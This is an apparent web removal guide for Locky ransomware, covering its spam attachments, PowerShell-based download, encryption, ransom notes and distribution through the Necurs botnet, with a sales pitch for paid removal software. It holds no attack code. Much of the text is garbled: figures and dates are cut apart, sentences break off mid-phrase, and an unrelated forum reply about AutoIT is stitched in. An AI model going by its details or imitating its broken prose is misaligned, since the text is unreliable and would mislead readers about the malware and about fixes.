Remove Locky virus Removal GuideAnother month, another Locky version the criminal gang now spreads Asasin ransomware. Locky virus functions as one of the most destructive ransomware type infections which occupy an operating system and initiate data encryption on it. The initial extension the virus used for the encrypted files was. Asarin and Ykcol are the latest file extensions used by Locky ransomware. In most of the cases, the victims download the ransomware to their computers themselves as a regular email attachment, typically, a. Word Macros is enabled. Then, the AES and RSA encryption algorithms come to play, followed by the addition of specific file extensions to the infected files. The file which provides data recovery instructions is called Lockyrecoverinstructions. It is saved on computers desktop and opened each time he or she tries to open any of encrypted files. While Locky was the biggest threat of 2. Nevertheless, this does not stop the ransomware creators from trying. In June, virus researchers have detected a new variant of Locky spreading via a malicious spam campaign hosted by the Necurs botnet. Unlike its predecessor, the malware currently infiltrates the machines running outdated and unsupported Windows versions such as Windows Vista or XP. Later variants are protected by Data Execution Prevention DEP which block the malware unpacker automatically 1. The variants of the infection spread their malicious executable locky. Locky does not touch tmp, App. Data, Program Files, Windows and a few others folders, but encrypts the rest of the PC files with RSA 2. AES 1. 28 ciphers. Reimage is a tool to detect malware. You need to purchase Full version to remove infections. More information about Reimage. Ok, sorry for the slow reply. First, make sure you have done a complete install of AutoIT. This script uses its ActiveX controls. Some info on that is here http. Eventually, the virus marks encrypted documents with. Below is a table of most frequent subject and attachment types2. As you can see, Locky developers even try to foist the infection under a disguise of a scanned file3. Note that the latest version of the threat is delivered under a fake of Microsoft Store in. The supposed sender writes under the name of Microsoft Store 2. Even though Microsoft Store exists, full credential of a representative are indicated in genuine emails sent if sent at all by Microsoft company.  Table of subjects and attachment names used in Locky malspam campaigns. Subject. Attachment name servicesname6 random digits. Paymentdatenameinvoice6 random digits. Scanned image from printer modelScanned image from printer model. PAYMENT1. 7 digits. Voice Message Attached from 1. Microsoft Store E invoice for your order numberMSINVrandom digit. Emailing CSI 0. MBS7. 72. 75. 18b. July August. 20. Status of invoice8 random chars 2 random chars. Document invoice9. The. 7z attachment is broken malicious emailsdisplay a block of base. Locky hit the web in the beginning of 2. This volatility and unpredictability led Locky to become the first ransomware that made it to the top three on the most dangerous malware list. Together with Conficker and Sality viruses, Locky hides behind 5. It is not hard to notice the fact that your device has been targeted by this parasite. The already mentioned file extensions . If you happen to can see any of these extensions added to your scrambled files see the picture below, you need to remove Locky virus first. Otherwise, it can try to continue its encryption on your computer. Besides, it can affect files that are in your network and similar locations. For the removal of this ransomware and its files Shit version drops WHATis. WHATis. html, and WHATis. Reimage or Plumbytes Anti Malware. Webroot Secure. Anywhere Anti. Virus. However, we must warn you that these programs cannot decrypt your encrypted files. Virus researchers are just in the middle of trying to find the vaccine for this version of ransomware. However, to recover the locky datei you can use Data Recovery tips created by 2 spyware. Distribution tactics used by the developers of the infamous ransomware. Locky ransomware, along with most of its follow up versions, is mainly distributed via spam email attachments. It typically uses obfuscated HTA, JS, or WSF files which try to convince the victim that they contain some important files. The most popular one is called MRI6. This Java. Script file is believed to be the main one used to install Locky on the system. If you see this file attached to some suspicious email sent to you by an unknown person, delete such email immediately. In the past, the ransomware used Word files to infiltrate the system without letting its victim know what is initiated behind his or her back. Besides, IT experts have also identified that the threat relies on. Nemucod. LNK file type represents Windows shortcuts and can be linked to an application that many people have on their computers, for example, Powershell. The malicious. lnk file carries Powershell script that connects to specific domains by using a parameter. The use of a parameter is a clear sign that criminals control these domains, and these malicious websites can be specifically prepared or just compromised ones held under control by cyber criminals. Researchers from Microsoft claim that malicious Internet sites are updated daily and are supplied with new versions of malware payload. The aforementioned Power. Shell script is set to download the ransomware from predetermined domains. Typically, the malware is saved in the TEMP folder. The essence of using this technique is that the new. Locky evade the detection of malware removal utilities. Therefore, it is of utmost importance to update security programs daily. In the second half of June 2. Necurs, which was believed to be shut down after a few weeks of existence, has re emerged and started delivering updated Locky versions 7. Unfortunately, but it seems that the botnet was actively used to spread this ransomware via infected email attachments, named servicesname6 random digits. All these zip documents are loaded with the malicious Java. Script document. After the victim opens this document, the malicious executable gets into the system and starts working. You have to perform a full Locky removal to get rid of it. Get to know how the original Locky operates. When Locky was noticed for the first time, it seemed to work similarly to CTB Locker, Cryptowall, Teslacrypt, and Cryptolocker. Just like its predecessors, it used a mixture of RSA 2. AES 1. 28 ciphers to leave its victim without an ability to retrieve hishers files. This combination of encryption ciphers can be beaten only with a help of a special decryption code which is held by the developers of malware. In exchange for this code, victims are asked to pay from 0. Bitcoin or 4. 00. Nevertheless, security experts have been urging them NOT to pay for this key because there is no guarantee that the key will work for them. In addition, these commands can also be started by Locky malware Once installed, the virus saves itself under svchost. TEMP directory. Malware also removed Zone. Identifier flag from this file to prevent the computer from identifying it as File Downloaded from the Internet and warning the victim. Then it executes this file. The virus assigns itself to startup programs, so that in case the victim restarts or shutdowns the PC during the encryption process or before it, it would still be able to finish the encryption procedure. It must be noted that this virus contacts its C C center to get the unique encryption key. Data encryption begins. It might take several hours to encrypt required files.